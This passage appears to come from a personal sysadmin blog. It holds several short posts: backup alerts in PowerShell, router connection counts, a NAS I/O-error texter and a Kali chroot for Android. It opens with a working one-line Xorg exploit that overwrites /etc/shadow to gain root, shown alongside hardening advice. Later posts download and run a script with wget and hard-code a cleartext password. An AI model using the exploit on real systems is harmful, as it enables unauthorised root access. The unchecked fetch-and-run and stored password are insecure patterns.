#!/zitstif.no-ip.org/

Example of exploit: cd /etc; Xorg -fp “root::16431:0:99999:7:::” -logfile shadow :1;su

This is just another reason why if you run a headless server, to not have Xorg or a GUI installed. Reduce the attack surface as much as you can.

$value = get-wbsummary | select -expandproperty lastbackupresulthr

if ( $value -ne 0 )
{
$EmailFrom = “YourGmailAccount@gmail.com”
$EmailTo = “WhoYouWantTonotify@domain.com”
$Subject = “Notification from Windows Server Backup”
$Body = “Last backup may have failed…”
$SMTPServer = “smtp.gmail.com”
$SMTPClient = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
$SMTPClient.EnableSsl = $true
$SMTPClient.Credentials = New-Object System.Net.NetworkCredential(“YourGmailAccount”, “yourcleartextpassword”);
$SMTPClient.Send($EmailFrom, $EmailTo, $Subject, $Body)
}

The code is pretty self explanatory. (The main block I just found from howtogeek.com) Granted it is not secure because it’s storing a cleartext password. You can save this in a .ps1 file and create a scheduled task that runs with at least admin privileges (the function ‘get-wbsummary’ requires admin rights) after a backup has ran.

The $EmailTo variable you could use an SMS gateway to get a text notification. (See this list.) For instance if your phone number is 6165559876 and you have Verizon, it would look like this: $EmailTo = 6165559876@vtext.com.

At my work in the past we’ve had to hunt down infected systems that have caused networks to come to a near standstill and their WAN IP/email DNS name to become blacklisted. On routers with dd-wrt, there’s a nice feature where you can see a connection count per each system. A majority of the time we have discovered that systems with very high connection counts tend to be infected and cause network issues. Unfortunately, dd-wrt doesn’t really cut it anymore for our needs and we had to shift over toward different firmware alternatives (like http://tomato.groov.pl/?page_id=164 or https://www.snbforums.com/threads/fork-asuswrt-merlin-374-43-lts-releases-v22e4-23b8.18914/ ). However, these alternatives tend to not have a connection count feature. After some googling, I’ve found a work around if you can get ssh or telnet access to the device:

cat /proc/net/ip_conntrack | awk '{print $5}'| cut -d: -f1 | sort | uniq -c | sort -nr | fgrep "$(ifconfig br0 | grep "inet addr" | awk '{print $2}' | sed 's/addr://g' | cut -d. -f1-3)"

You can download from my website and run it this way:

wget http://zitstif.no-ip.org/concount; watch -n 1 ‘/bin/sh concount’

Recently a good friend be-gifted me Banana PI M3 for my birthday. I decided to turn it into a NAS. Granted it is no Synology NAS but it gets the job done and openmediavault is a wonderful software suite to use on it. I thought to myself, “It would be nice to get a notification if there are any I/O errors via dmesg on my homemade NAS. So I whipped up a simple solution:

vim /bin/ioerrorcontact

#!/bin/bash

if dmesg | fgrep ‘I/O error’ &> /dev/null;
then
curl http://textbelt.com/text -d number=MyPhoneNumber -d message=”I/O Error on your NAS” &> /dev/null;
fi

crontab -e

0 * * * *       bash /bin/ioerrorcontact

This is just a quick and simple hack but it’s peace of mind knowing that I have something in place to notify me if my simple NAS is having any issues, especially since I do not have RAID 1 configured on it. RAID 1 via BananaPi or really any other Pi devices at this point isn’t really that great because you would have the split one SATA channel/bandwidth to be able to get it to work. I also strongly recommend that if you’re going to build a low powered NAS device using a Pi device, to use the BananaPi because it has gigabit Ethernet. Other than that, if you have the money to shell out and want a better solution, I recommend Synology NAS products.

#Update 4/14/2017

Textbelt.com now requires a key parameter and is no longer ‘free’:

For those of you who don’t own devices that are officially supported by nethunter or if you’re not having any luck porting over nethunter using this method: https://github.com/offensive-security/kali-nethunter/wiki/Porting-Nethunter , there is hope for you to at least run Kali on your device. Of course you need a device that is rootable and you’ll need to download the following 7z file:

https://archive.org/download/Kali.nogui.armel.zitstif.chroot.482013/kali.nogui.armel.zitstif.chroot.482013.7z

kali.nogui.armel.zitstif.chroot.482013.7z

md5: d60c5a52bcea35834daecb860bd8a5c7
sha1: f62c2633d214de9edad1842c9209f443bcea385d

kali.img

MD5: be61799f8eb2d98ff8874daaf572a1d5
SHA-1: f9c6a820349530350bbb902d17ae6b4a5173937c

Then simply look over this post: http://zitstif.no-ip.org/?p=811

Once you have this setup, according to “JosephTheHacker Pwn3r” :

“Great News ,I have successfully updated your kali img into rolling edtion! ,It really works at my tablet by editing the sources.list file in the “/etc/apt/sources.list”

in sources.list:

deb http://http.kali.org/kali kali-rolling main contrib non-free

deb-src http://http.kali.org/kali kali-rolling main contrib non-free

then I typed apt-get upgrade!

and also I doubled checked the new tools installed on kali img”

So essentially you’ll have to just edit your sources.list file to only have these repositories and issue a:

apt-get update && apt-get dist-upgrade -y

As for how well it works, I’m not quite sure because I am now running the nethunter ROM on my Nexus 6. However, I would like to thank “JosephTheHacker Pwn3r” for looking into this and informing me. Lastly, if rooting your phone is not an option but you still want a debian terminal based environment to work with, I highly recommend checking out Termux:

https://play.google.com/store/apps/details?id=com.termux&hl=en